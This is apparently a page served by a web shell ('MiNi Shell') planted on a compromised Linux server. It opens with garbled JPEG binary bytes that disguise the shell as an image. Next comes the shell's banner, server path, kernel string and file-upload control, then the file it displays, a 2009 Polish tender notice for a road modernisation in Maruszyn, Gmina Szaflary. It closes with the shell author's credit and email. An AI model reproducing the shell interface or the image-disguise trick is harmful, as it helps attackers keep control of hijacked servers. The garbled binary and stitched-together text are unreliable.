JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090703/222386-N-2009.html

<p class="kh_header"><b>Szaflary: Modernizacja ulicy Jana Pawła II w Maruszynie, Gmina Szaflary.</b><br>
<b>Numer ogłoszenia: 222386 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Zakopiańska 18, 34-424 Szaflary, woj. małopolskie, tel. 018 2754703, faks 018 2754977.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szaflary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ulicy Jana Pawła II w Maruszynie, Gmina Szaflary..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie modernizacji drogi gminnej w Maruszynie: 

Droga gminna nr K364775, ul. Jana Pawła II w Maruszynie
      Zakres robót:
- Roboty ziemne i przygotowawcze.
- Chodnik.
- Nawierzchnia asfaltowa.
- Pobocza.
- Roboty porządkowe.

Szczegółowy zakres robót zawierają: 
Dokumentacja kosztorysowa, przedmiary robót budowlanych (kosztorysy ślepe). 
Prace objęte przedmiotem zamówienia muszą być zgodne z dokumentacją kosztorysową, 
specyfikacją techniczną wykonania i odbioru robót budowlanych oraz sztuką budowlaną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.32.20-7, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium na zadania w wysokości: 

    15.000,00 zł, słownie: piętnaście tysięcy złotych 00/100.

Wykonawca wnosi wadium: 

1. w pieniądzu: sposób przekazania: na konto Zamawiającego Nr 04 8812 0005 0000 0000 2134 0009.
2. w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3. w gwarancjach bankowych; 
4. w gwarancjach ubezpieczeniowych; 
5. w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. Zm.), 

Sposób przekazania: Oryginały dokumentów złożone w kasie Urzędu Gminy przed upływem 
terminu składania ofert, a kopie dołączone do oferty przetargowej. 

Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się 
termin uznania na rachunku Zamawiającego, a kopię przelewu należy dołączyć do oferty 
przetargowej. 

Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne 
żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, 
następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu 
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
    ustawy nakładają obowiązek poosiadania takich uprawnień; 
2) posiadają niezbędna wiedzę i doświadczenie oraz potencjał techniczny, a także
    dysponują osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne
    zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób   
    zdolnych do wykonania zamówienia;  
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 


2. Warunki szczegółowe wymagane od Wykonawców: 
1. Zobowiązani są do pełnej wyceny wszystkich pozycji kosztorysu z uwzględnieniem w   
    ostatecznej cenie ofertowej wszelkich ewentualnych kosztów związanych z dostarczeniem 
    materiałów, organizacją i zabezpieczeniem placu budowy, korzystania z energii
    elektrycznej i wody na budowie, wykonaniem tymczasowych przejść, przejazdów i  
    ogrodzeń oraz związanych z wykonaniem pełnej obsługi geodezyjnej, dokumentacji  
    powykonawczej geodezyjnej, a także uporządkowaniem placu budowy po zakończeniu 
    robót. Wykonawca zobowiązany jest do złożenia oświadczenia, że wszelkie prace 
    geodezyjne zostały uwzględnione w cenie złożonej oferty. 
2. Zobowiążą się do zabezpieczenia finansowania robót we własnym zakresie. 
3. Udzielą gwarancji, niezależnie od rękojmi, na okres minimum 3 lata na wykonany 
    przedmiot umowy. 
4. Posiadają aktualną polisę OC w zakresie prowadzenia działalności gospodarczej. 

3. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne 

Z ubiegania się o udzielenie zamówienia publicznego wyklucza się: 

-wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie 
publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych, 
-wykonawców, którzy wykonywali czynności związane z przygotowaniem prowadzonego 
postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w 
dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni 
uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się 
zamówienia na podstawie art. 62 ust.1 pkt 2 lub art. 67 ust.1 pkt 1 i 2; 
-wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik 
prowadzonego postępowania, 
-wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w 
postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone 
dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust.3; 
-wykonawców, którzy nie wnieśli wadium, w tym również na przedłużony okres związania 
ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. 

Zamawiający odrzuca ofertę, która: 

-jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków 
  zamówienia, 
-jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
   nieuczciwej konkurencji, 
- zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, 
-została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
  zamówienia lub nie zaproszonego do składania ofert, 
-zawiera błędy w obliczeniu ceny, 
- wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na 
  poprawienie omyłki, o której mowa w art. 87 ust. 2pkt 3 ustawy PZP,
 - jest nieważna na podstawie odrębnych przepisów, 
Inne podstawy odrzucenia oferty: 
-Nie spełni warunków szczegółowych wymaganych od wykonawców podanych w 
specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. -Prawo zamówień publicznych, wykonawca składa następujące dokumenty: 

1. Dokumenty wymagane: 
- formularz ofertowy i cenowy z wykorzystaniem wzoru - załącznik nr 1,
- dowód wniesienia wadium, 
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
- dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych ( pełnomocnictwa itp.), 
- aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
- dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu 
zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek 
posiadania takich uprawnień (uprawnienia budowlane, uprawnienia budowlane branżowe, zaświadczenia o wpisie na listę właściwej Izby Inżynierów Budownictwa), 
- oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 oraz art. 24 ust.1 i 2 ustawy Prawo Zamówień Publicznych z wykorzystaniem załącznika nr 2. 

Dokumenty dodatkowe: 
-w przypadku spółek prawa handlowego, stosownie do przepisów art.230 Kodeksu Spółek Handlowych - dokumenty potwierdzające uprawnienia osób reprezentujących spółkę do zawierania umów o wartości dwukrotnie przewyższającej wysokość kapitału zakładowego tj. stosowną uchwałę zgromadzenia lub umowę spółki, jeżeli z jej treści wynika, że podejmowanie takiej uchwały jest wymagane. 

2. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty,wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania,potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie, 
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 

3. Dokumenty wymagane w przypadku składania oferty wspólnej 
- umowa regulująca współpracę podmiotów występujących wspólnie, 
-Oferta winna zawierać dokumenty wyszczególnione w specyfikacji dla każdego partnera z osobna, pozostałe dokumenty (załączniki) składane są wspólnie. 

4. Inne dokumenty: 
4.1. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty: 
- informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie - według załącznika nr 5, 
- wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował wykonawca - według załącznika nr 6, 
- wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem 
wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania - według załącznika nr 7,
- licencję na wykonywanie krajowego transportu drogowego rzeczy.
- referencje - min. 3 sztuki z różnych instytucji publicznych na wykonane zamówienia tożsame z przedmiotem tego postępowania.

4. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składa następujące dokumenty: 
- informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
wykonawca posiada rachunek, potwierdzającą wysokość środków finansowych lub 
zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed 
upływem terminu składania ofert, 
- polisę, a w przypadku jej braku, innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, 

5. Dokumenty dodatkowe. 
- Formularz cenowy -załącznik nr 1, 
- Wykaz osób do kontaktów z Zamawiającym odpowiedzialnych za wykonanie zobowiązań umowy - według załącznika nr 4, 
- Kosztorysy ofertowe, 
- Wykaz podwykonawców oraz robót, które Wykonawca chce im powierzyć według 
   załącznika nr 8, 
- Podpisany i parafowany na każdej stronie projekt umowy jako załącznik nr 3. 

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii 
potwierdzonych za zgodność przez osobę - osoby uprawnioną do podpisania oferty z dopiskiem (za zgodność z oryginałem)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szaflary.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Szaflary, 34-424 Szaflary, ul. Zakopiańska 18, pok. nr 8 w godzinach od 8,00 do 15,00 od poniedziałku do piątku lub w formie elektronicznej na stronie internetowej Zamawiającego, j.w..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 09:00, miejsce: Urząd Gminy Szaflary, 34-424 Szaflary, ul. Zakopiańska 18, pok. nr 10 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający podpisze umowę z Wykonawcą, który przedłoży najkorzystniejszą ofertę z 
punktu widzenia kryteriów przyjętych w niniejszej specyfikacji.  
2. Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej 
specyfikacji oraz danych zawartych w ofercie. 
3. Postanowienia umowy zawarto w projekcie umowy, który należy, podpisać, strony 
zaparafować i dołączyć do oferty jako załącznik nr 3. 
4. Dokonywanie zmian w zawartej umowie.
    W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień w zawartej   
    umowie może nastąpić w następujących przypadkach:
1. zmiany kluczowych specjalistów (inspektorów nadzoru) przedstawionych w umowie - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody.
2. zmiany terminu wykonania umowy o czas opóźnienia jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a) zawieszenia robót przez Zamawiającego,
b) szczególnie niesprzyjających warunków atmosferycznych,
c) zmian w dokumentacji dokonanych na wniosek zamawiającego,
d) opóźnienia przekazania terenu realizacji robót,
e) zmiany terminu dokonania odbioru robót przewidzianych w umowie,

Creat By MiNi SheLL
Email: jattceo@gmail.com